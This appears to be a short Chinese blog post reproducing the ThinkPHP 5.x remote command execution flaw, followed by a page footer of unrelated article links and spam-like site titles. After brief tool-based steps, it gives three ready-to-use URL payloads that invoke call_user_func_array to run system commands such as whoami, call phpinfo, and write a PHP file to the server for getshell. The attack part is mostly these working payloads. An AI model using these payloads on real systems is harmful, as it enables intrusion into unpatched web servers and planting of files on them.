当前位置: 首页 > news >正文

thinkphp漏洞再现

news 来源:原创 2025/6/13 6:49:36

Thinkphp5x远程命令执行及getshell

1、开环境

2、使用工具攻击

开启工具

输入地址,点击漏洞检测

存在漏洞之后,选择漏洞,执行命令

3、也可以执行远程命令

执行命令

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

相关文章:

  • Anaconda 安装NCL (Linux系统)
  • GithubPages+自定义域名+Cloudfare加速+浏览器收录(2025最新排坑)
  • [免费]SpringBoot+Vue扶贫管理系统【论文+源码+SQL脚本】
  • Unity3D 动态遮挡剔除(Occlusion Culling)
  • 基于Spring Boot的智能停车计费系统的设计与实现(LW+源码+讲解)
  • 针对 WebView 强制使用本地字体的完整解决方案
  • windows docker如何修改 默认的Container memory usage
  • 2025-如何创建自己的电商网站
  • cfca 申请国密证书流程
  • Aider的Repo Map功能
  • 跨域问题的解决方案
  • 基于MATLAB的涡旋光和高斯光叠加产生平顶光
  • 深入解析 TCP:可靠传输的基石
  • YAML是什么?
  • 借助Trae从零开始完成贪吃蛇的项目
  • 解决 Element UI 嵌套弹窗显示灰色的问题!!!
  • LeetCode 解题思路 24(Hot 100)
  • 清华大学第12弹:《DeepSeek政务应用场景与解决方案》.pdf(文末附免费下载地址)
  • git_version_control_proper_practice
  • 【QT】Qlcdnumber的使用
  • 有没有做ppt好看的免费网站/网站关键词收录查询
  • 网站建设找谁做/百度seo学院
  • 做java一个网站/最新社会舆情信息
  • 南宁网站 制作/仓山区seo引擎优化软件
  • 网站建设公司哪家好智搜宝/网络推广的公司更可靠
  • 营销网站建设哪家便宜/营销软文推广平台